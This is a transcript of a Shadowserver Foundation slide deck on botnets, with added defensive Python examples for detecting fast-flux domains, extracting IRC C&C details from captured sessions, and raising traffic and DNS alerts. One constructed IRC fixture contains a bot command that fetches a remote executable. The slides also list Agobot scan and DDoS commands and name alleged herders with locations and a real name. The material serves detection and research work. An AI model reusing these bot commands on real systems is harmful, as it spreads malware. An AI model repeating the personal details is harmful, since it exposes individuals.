Botnets and Botherders The Shadowserver Foundation - PowerPoint PPT Presentation

1
Botnets and Botherders: The Shadowserver Foundation
  • Hillar Leoste

2
Agenda
  • Botnets
  • Shadowserver
  • Botnets IRL
  • Questions

3
Botnets: The Good, Bad, and Ugly
  • A look into the methods, usage, control, and
    motivations of botnet herders

4
Definitions
  • Botnet
    • A distributed network of compromised computers
      controlled by a malicious user via a command
      and control mechanism.
  • C&C
    • Command & Control
    • A computer or a network of computers, controlled
      by a herder, that sends commands to the botnet.
  • Drone or Zombie
    • A compromised computer that receives commands via
      the C&C.
  • Bot Herder
    • Individual who owns or controls the botnet.
  • IRC
    • A protocol designed for real-time chat
      communication, based on a client-server architecture.

5
Botnets - Spreading
  • Scanning
    • exploiting vulnerabilities
    • Night of the Living Dead
  • Email and IM links
    • still a major vector
  • Drive-by Downloads
    • Web redirects
    • Social networking sites
  • P2P sharing

6
Bot autopropagation infection scheme (diagram: distribution server,
C&C and victim host connected over the Internet)
1. Are you vulnerable to Win X problem?
2. Yes / No
3. If Yes, send malware to infect
4. After installation, connect to C&C
5. Master command: download / update
6. Request download from distribution server
7. Sends requested download
7
Botnets - Spreading
8
Botnets - Infections
9
Botnets - 0day Infections (monthly stats)
10
Botnets - Retest Infections (monthly stats)
11
Bot - Details
  • Architecture
    • Agobot
      • Sophisticated, complete, modular
      • Rootkit-like capabilities
      • P2P protocol
    • SDBot
      • Much simpler and smaller
      • Easy to extend
      • Hundreds of variants
  • Control
    • Agobot
      • Standard and custom IRC commands
        • ddos_maxthreads
        • spam_aol_channel
        • bot_topiccmd
    • SDBot
      • Lightweight IRC
      • Executes the channel topic as a command
      • Interprets other messages as commands

12
Bot - Details
  • Propagation
    • Agobot
      • Assigns network ranges to drones
        • scan.addnetrange
        • scan.startall
    • SDBot
      • Base version has no scanning capabilities
      • Variants now include scanning and propagation,
        some very advanced
  • Attack Mechanisms
    • Agobot
      • Elaborate set of self-contained modules
      • Many types of DDoS attacks
    • SDBot
      • No exploits in the base version
      • Easily and rapidly expanded

13
Botnets - Control
  • Centralized
    • IRC
      • Easy to deploy
      • Low latency
      • Central weak link
    • HTTP
      • Drone calls home via port 80
      • Can seem like normal traffic
  • Distributed
    • P2P
      • No central server
      • More complex
      • More difficult to detect and take down
  • Hybrid
    • IRC/HTTP
    • P2P/HTTP

14
Botnets - Usage
  • DDoS attacks
    • TCP or UDP floods
    • HTTP spidering
  • Spamming
    • Phishing
    • Harvest email addresses
  • Traffic Sniffing
    • Interesting clear-text data
    • Can help 'steal' other botnets
  • Keylogging / E-Fraud
    • bypasses encrypted channels
    • use of filters
  • Malware Propagation
    • scanning and infecting
    • rapid deployment of exploits
  • Click-through Fraud
    • pay-per-click
    • manipulate polls, surveys, etc.
  • Warez and Pirated Goods

15
Botnet attack on a webserver / node (diagram: drones on the Internet
flood the target; the webserver / node crashes and its access line is
blocked)
16
Botnets - Usage (DDoS)
17
Botnets - Herder Defense
  • Use of Dynamic DNS
  • Short TTL in DNS records (fast-flux)
  • Channel and server changes
    • Being directed to another C&C
    • Via HTTP download
  • Obfuscate drone hostnames
  • Encryption of intra-channel communications
  • Modified IRC servers
  • Anti-sandbox mechanisms in binaries
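The fast-flux point on this slide (short TTLs, answers that churn across unrelated networks), as an added example that is not part of the original presentation: given a few repeated A-record lookups for a name, flag the domains whose TTL is short and whose answer set keeps changing across several networks. The lookups are constructed, the /16 grouping stands in for an ASN lookup, and the thresholds are assumptions to tune against your own resolver data.

```python
"""Spot fast-flux style DNS behaviour from repeated A-record lookups.

Added example, not from the original slides. The lookups below are
constructed; in practice they would come from a resolver (e.g. dnspython
queries every few minutes) or from passive DNS. The /16 stand-in for the
"hosting network" and the thresholds are assumptions, not published values.
"""
from collections import defaultdict
from ipaddress import ip_network

# Constructed sample: (domain, ttl_seconds, answers) per successive lookup.
# cc.example.net behaves like fast-flux; www.example.org is ordinary hosting.
LOOKUPS = [
    ("cc.example.net", 120, ["198.51.100.7", "203.0.113.44", "192.0.2.9"]),
    ("cc.example.net", 120, ["203.0.113.201", "198.51.100.130", "192.0.2.77"]),
    ("cc.example.net", 60, ["192.0.2.250", "203.0.113.9", "198.51.100.222"]),
    ("www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
    ("www.example.org", 3600, ["192.0.2.10", "192.0.2.11"]),
]


def hosting_net(ip):
    """Crude stand-in for the hosting network: the enclosing /16.
    Real tooling maps each answer to its ASN (or to residential ISP ranges,
    which is where flux nodes usually live) instead."""
    return str(ip_network(ip + "/16", strict=False))


def summarize(lookups):
    """Per-domain view across all lookups: smallest TTL seen, how many
    distinct addresses were answered, and how many distinct networks."""
    by_domain = defaultdict(list)
    for domain, ttl, answers in lookups:
        by_domain[domain].append((ttl, answers))
    stats = {}
    for domain, rows in by_domain.items():
        ips = {ip for _, answers in rows for ip in answers}
        stats[domain] = {
            "lookups": len(rows),
            "min_ttl": min(ttl for ttl, _ in rows),
            "unique_ips": len(ips),
            "unique_nets": len({hosting_net(ip) for ip in ips}),
        }
    return stats


def is_fast_flux(stat, max_ttl=300, min_ips=5, min_nets=3):
    """Heuristic: short TTL *and* a churning answer set spread over several
    networks. CDNs also use short TTLs, so the TTL alone is not a signal."""
    return (stat["min_ttl"] <= max_ttl
            and stat["unique_ips"] >= min_ips
            and stat["unique_nets"] >= min_nets)


def flux_domains(lookups):
    """Domains in `lookups` that meet the fast-flux heuristic, sorted."""
    return sorted(d for d, s in summarize(lookups).items() if is_fast_flux(s))


if __name__ == "__main__":
    for domain, stat in summarize(LOOKUPS).items():
        print(domain, stat, "FLUX" if is_fast_flux(stat) else "ok")
```

The point of requiring all three conditions is that a short TTL by itself also describes every CDN; it is the combination with an answer set that never settles and is spread over unrelated address space that is specific to a herder rotating drones behind a name.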

18
Botnets - Motivation
  • Script kiddies stay away!
  • For-profit industry
    • Becoming an industry
    • underground network
    • various roles
  • Targeted Attacks
    • Sophistication
    • Industrial espionage
    • State sponsored

19
Botnets - Organizational
  • Dedicated networks
  • IRC, P2P, Web sites
  • Various roles and hierarchies
  • Advertising
  • Consumer Reports
  • Traffic in a variety of goods and services
  • Public Information
  • No presumption of privacy
  • Relationships

20
Botnets - Relationships
21
Botnets - Relationships
22
Detection, Tracking, and Closure?
  • The Shadowserver Foundation process and
    methodology

23
Shadowserver
  • The Shadowserver Foundation
    • An all-volunteer watchdog group of security
      professionals that gather, track, and report on
      malware, botnet activity, and electronic fraud.
  • It is the mission of the Shadowserver Foundation
    • To improve the security of the Internet by
      raising awareness of the presence of compromised
      servers, malicious attackers, and the spread of
      malware.

24
Shadowserver
25
Botnets - Detection & Capture
  • Honeypots
    • Auto-submit
    • Deploy on a wide variety of IP space
    • Server and client based
  • Honeytokens
    • Email, IM, IRC
    • Spamtraps
    • Link spam
    • Social networking
    • Forums
  • Server based
    • Emulate vulnerable systems
    • Deploy and wait
    • Nepenthes
  • Client based
    • Threats are changing
    • Initiate connections to the Internet
    • Emulate a user
    • Seed with known malicious URLs
    • HoneyC, Capture-HPC

26
Botnets - Nepenthes
27
Botnets - Sandboxing
  • Manual
    • Static
    • Dynamic
  • Automated
    • Notification
    • Classification
  • The Basics
    • C&C address, port, channel
    • Nick / ident
    • Passwords
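The "basics" listed above (C&C address, port, channel, nick/ident, password), together with the SDBot behaviour from the Bot Details slide of executing the channel topic as a command, as an added example that is not from the original presentation: it parses a constructed IRC transcript of a drone's first connection, as a sandbox would capture it on the wire, and pulls out exactly those facts. The server name, port, nick pattern and the ".ntscan" / ".download" strings are illustrative assumptions, not documented syntax of any real bot.

```python
"""Pull the C&C "basics" (server, port, channel, key, nick, ident, password)
and the commands a drone was given out of a captured IRC session.

Added example, not from the original slides. SESSION is a constructed
client/server transcript of the kind a sandbox captures from a drone's
first connection: '>' marks client-to-server lines, '<' server-to-client.
The server name, port, nick pattern and the '.ntscan' / '.download' command
strings are illustrative, not documented syntax of any specific bot.
"""

SESSION = [
    (">", "PASS s3cret"),
    (">", "NICK [USA|XP]38201"),
    (">", "USER rx 0 0 :rx"),
    ("<", ":irc.example.net 001 [USA|XP]38201 :Welcome"),
    (">", "JOIN #botz j01nk3y"),
    # RPL_TOPIC: an SDBot-style drone treats the channel topic as a command.
    ("<", ":irc.example.net 332 [USA|XP]38201 #botz :.ntscan 200 5 0 -s"),
    ("<", ":herder!h@example.net PRIVMSG #botz :.download http://198.51.100.7/u.exe u.exe 1"),
]


def parse_irc_line(raw):
    """Split one IRC line into (prefix, command, params) using RFC 1459
    framing: optional ':prefix', a command, space-separated params, and an
    optional trailing param introduced by ' :' that may itself contain spaces."""
    prefix = None
    if raw.startswith(":"):
        prefix, _, raw = raw[1:].partition(" ")
    trailing = None
    if " :" in raw:
        raw, _, trailing = raw.partition(" :")
    params = raw.split()
    if trailing is not None:
        params.append(trailing)
    if not params:
        return prefix, "", []
    return prefix, params[0].upper(), params[1:]


def extract_cc_basics(server, port, session):
    """Walk the transcript and record the facts a tracker needs to follow
    (or sinkhole) the channel. server/port come from the TCP connection the
    sandbox observed, not from the IRC payload."""
    facts = {
        "server": server, "port": port, "password": None, "nick": None,
        "ident": None, "channel": None, "channel_key": None,
        "topic_command": None, "channel_commands": [],
    }
    for direction, line in session:
        _prefix, cmd, params = parse_irc_line(line)
        if direction == ">":
            if cmd == "PASS" and params:
                facts["password"] = params[0]
            elif cmd == "NICK" and params:
                facts["nick"] = params[0]
            elif cmd == "USER" and params:
                facts["ident"] = params[0]          # username field of USER
            elif cmd == "JOIN" and params:
                facts["channel"] = params[0]
                facts["channel_key"] = params[1] if len(params) > 1 else None
        else:
            # 332 = RPL_TOPIC (<nick> <channel> :<topic>): the topic is what a
            # topic-driven bot executes on join.
            if cmd == "332" and len(params) >= 3 and params[1] == facts["channel"]:
                facts["topic_command"] = params[2]
            elif cmd == "PRIVMSG" and len(params) >= 2 and params[0] == facts["channel"]:
                facts["channel_commands"].append(params[1])
    return facts


if __name__ == "__main__":
    for key, value in extract_cc_basics("cc.example.net", 6121, SESSION).items():
        print(f"{key:17} {value}")
```

Note that the server and port are not in the IRC payload at all; they come from the TCP connection the sandbox saw, which is why the extractor takes them as arguments. The same parser applied to the ongoing channel traffic is what turns a sandbox run into the tracking data the later report slides describe.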

28
Botnets - Tracking
29
Botnets - Tracking
30
Shadowserver Revisited - Reports
500 custom reports produced daily
  • Report Types
    • DDoS
    • C&C List
    • Compromised Host
    • Click-Through Fraud
    • Drones
    • Proxies
    • URL Report
  • Filters
    • ASN
    • CIDR
    • Country Code
  • Recipients
    • 30 CERTs
    • 100 ASN owners
    • Bleeding Edge Snort
    • 5 public IRC services
    • 3 DNS registrars
    • 4 commercial vendors
    • 2 private mailing lists
    • 7 international LEOs
    • 3 US federal LEOs
    • 5 international government critical
      infrastructure groups

31
Shadowserver Revisited - DDoS Reports
32
Two Minutes
33
Botnets - Real Life
  • A case study of a group of bad actors on their
    actions and methodology

34
Botnets - Real Life
35
Botnets - Real Life
  • Binary captured by honeypot system on 2006-08-22
  • SDBot variant using rap_at_tamer.pikolata.net:6121
    as its C&C
  • Used 32 different hosts (IPs) as C&C servers in
    less than 60 days
  • Moved between servers at least 40 times
  • At least six other control channels known to use
    this hostname

36
Real Life - The Malware
  • The C&C spread 51 unique binaries in the two
    months
  • Two-thirds were SDBot variants; others were RBot,
    Zapchast, Parite.B, Kirsun, ...

37
Real Life - Spreading
  • Using standard spreading mechanisms (asn, dcom,
    lsass, ...)

38
Real Life - Usage
  • Running DDoS (targets were usually servers being
    run by 'enemy' groups)
  • Keylogging (data used for ID theft and e-fraud)

39
Real Life - More Usage
  • Click-fraud (Money-making. Accounts could be used
    to track back the herders)
  • Clone flooding (Often advertising new underground
    servers and carding channels)

40
Real Life - Cooperation
  • Cooperative scanning of network ranges
  • Downloading/installing binaries for a 'friend' or
    in exchange for something
  • Helping out with bots to DDoS targets that can
    handle a high load
  • Sharing/trading private IRC servers
  • Sharing/trading bot sources and binaries

41
Real Life - ChanOps
  • mrbet: DDoS, Sniffing
  • MrYlLi: Clone flooding, proxies
  • KaHIN: DDoS, Clone flooding
    • Location: Turkey
    • Realname: Mehmet

42
Real Life - More ChanOps
  • Sh3llx: DDoS, Sniffing, Clone flooding
  • Bill: DDoS
    • Location: Kosovo
  • gu3sT: DDoS, Proxies, Clone flooding
43
Real Life - Summary
  • Several domain names were removed
  • Several servers shut down
  • No real effect on the operations of this group
  • Why?

44
Future Trends
  • Where is all this going? What do we have to look
    forward to?

45
Future Trends - Malware
  • Rootkits
    • AntiVirus detection
  • Scripting Worms
    • RSS hijack
  • Client-side Exploits
    • Escalation of privileges
  • Packers and Protectors
    • Themida, private packers

46
Future Trends - Themida
47
Future Trends - Botnets
  • New Protocols
    • HTTP, P2P, VoIP, IM
    • Nugache, Skype and Storm worm
  • Encryption
  • Covert channels via TCP and ICMP tunneling
  • Smaller and Distributed Botnets
  • Distributed DNS services
  • Stronger Protection of the Botnet
  • Industry Bankroll

48
HTTP-based C&C
  • BlackEnergy
    • Very simple and light
    • DDoS
    • Last known version 1.9.2
    • http://asert.arbornetworks.com/2007/10/blackenergy-ddos-bot-analysis-available

49
HTTP-based C&C
  • Zunker
    • Sophisticated
    • SPAM
    • http://pandalabs.pandasecurity.com/archive/Zunker.aspx

50
HTTP-based C&C
  • MPack
  • ICEPack
  • Barracuda
  • Pinch
  • etc

51
Customer Actions
  • Is there anything of value for my customers?

52
Customers
  • What should you be telling your customers?
  • What can they be doing?
  • How will any of this help them?

53
Botnets - Detection Methods
  • Network Traffic
    • Connections to IRC or known C&C servers
    • Rate of outgoing connections
  • DNS Trends
    • Unusual rate of lookups
    • Sudden increase in lookups across the network
  • Intrusion Detection Systems (IDS)
    • Bleeding Edge Threats signatures
  • Listen to your Users
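The network-traffic and DNS-trend methods on this slide as an added example, not code from the original presentation: three small rules run over constructed flow and DNS records, one for connections to known C&C or IRC ports, one for the rate of outgoing connections, and one for DNS lookup rates both per host and across the network. The C&C list, the records and the thresholds are all made up for the example; in practice they come from NetFlow, resolver logs and a feed such as the C&C list report mentioned earlier.

```python
"""Three of the slide's detection methods, run over constructed logs:
known-C&C / IRC-port connections, per-host outbound connection rate, and
DNS lookup rates (per host, and a network-wide jump against baseline).

Added example, not from the original slides. The flow and DNS records, the
KNOWN_CC feed and all thresholds are constructed/assumed; a real deployment
would read NetFlow and resolver logs and tune the numbers to its own baseline.
"""
from collections import Counter, defaultdict

KNOWN_CC = {"203.0.113.44"}            # constructed stand-in for a C&C list feed
IRC_PORTS = {6667, 6668, 6669, 6697}   # default IRC ports only; a C&C on a custom
                                       # port (the case study used 6121) is only
                                       # caught through the C&C list

# Constructed flow records: (epoch_seconds, src, dst, dst_port)
FLOWS = [
    (0, "10.0.0.5", "203.0.113.44", 6121),   # listed C&C on a non-IRC port
    (5, "10.0.0.6", "198.51.100.2", 6667),   # connection to an IRC port
    (6, "10.0.0.7", "192.0.2.200", 443),     # ordinary HTTPS
]
# A scanning drone: 150 connections to distinct hosts on 445 within 15 s.
FLOWS += [(10 + i // 10, "10.0.0.8", f"192.0.2.{i % 250 + 1}", 445) for i in range(150)]

# Constructed DNS query records: (epoch_seconds, src, qname).
# Five quiet minutes (10 lookups each), then 60 lookups in minute 5 from one host.
DNS = [(m * 60 + i * 6, f"10.0.0.{i % 4 + 1}", f"site{i}.example.org")
       for m in range(5) for i in range(10)]
DNS += [(300 + i, "10.0.0.9", f"rand{i}.example.net") for i in range(60)]


def cc_connections(flows):
    """Flows whose destination is on the C&C list or on a default IRC port."""
    hits = []
    for _ts, src, dst, dport in flows:
        if dst in KNOWN_CC:
            hits.append((src, dst, dport, "known C&C"))
        elif dport in IRC_PORTS:
            hits.append((src, dst, dport, "IRC port"))
    return hits


def outbound_rate_alerts(flows, window=60, threshold=100):
    """Hosts that contact more than `threshold` distinct (dst, port) pairs
    inside one `window`-second bucket: the signature of a scanning drone."""
    peers = defaultdict(set)
    for ts, src, dst, dport in flows:
        peers[(src, ts // window)].add((dst, dport))
    return sorted({src for (src, _b), p in peers.items() if len(p) > threshold})


def dns_alerts(dns, window=60, per_host=30, spike_factor=3.0):
    """Two DNS-trend rules: a single host doing more than `per_host` lookups
    in a window, and any window whose total exceeds `spike_factor` times the
    mean of all earlier windows (the 'sudden increase across the network')."""
    per_host_bucket, per_bucket = Counter(), Counter()
    for ts, src, _qname in dns:
        bucket = ts // window
        per_host_bucket[(src, bucket)] += 1
        per_bucket[bucket] += 1
    alerts = [("host-rate", src, b, n)
              for (src, b), n in sorted(per_host_bucket.items()) if n > per_host]
    seen = []
    for bucket in sorted(per_bucket):
        if seen:
            baseline = sum(per_bucket[b] for b in seen) / len(seen)
            if per_bucket[bucket] > spike_factor * baseline:
                alerts.append(("network-spike", "*", bucket, per_bucket[bucket]))
        seen.append(bucket)
    return alerts


if __name__ == "__main__":
    for hit in cc_connections(FLOWS):
        print("C&C   ", hit)
    print("scan  ", outbound_rate_alerts(FLOWS))
    for alert in dns_alerts(DNS):
        print("dns   ", alert)
```

The IRC-port rule only sees default ports; the case study's C&C listened on 6121, which only the list rule catches, so the two are complementary rather than redundant. The spike rule uses the mean of every earlier window as its baseline, which is fine for a short demonstration but drifts on long runs; use a sliding baseline (the same hour on previous days, for example) in production.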

54
Botnets - Defensive Strategies
  • Patching
    • Inventory all services
  • Limited Privileges
    • Applies to the entire user base
  • Firewalls
    • Don't forget egress filtering
    • Rate-limiting of uncommon protocols and ports
    • Anti-spoof filters
  • Antivirus / Antispyware
    • Caveats
  • IDS
    • Place it on all nets
    • FTP traffic on non-standard ports
  • Netflow
  • Proxy all Internet Traffic
    • Logs will contain everything
  • Log Analysis
    • Use the various tools and products
  • DNS Blackhole
    • Current lists of known bad sites
  • Vulnerability Awareness
    • Mailing lists, RSS, etc.
  • User Awareness / Education
    • Can't be overstated

55
Shadowserver and YOU
  • Cooperation and Collaboration
  • Data
  • Share experiences and discoveries

56
Shadowserver
  • http://www.shadowserver.org

57
Questions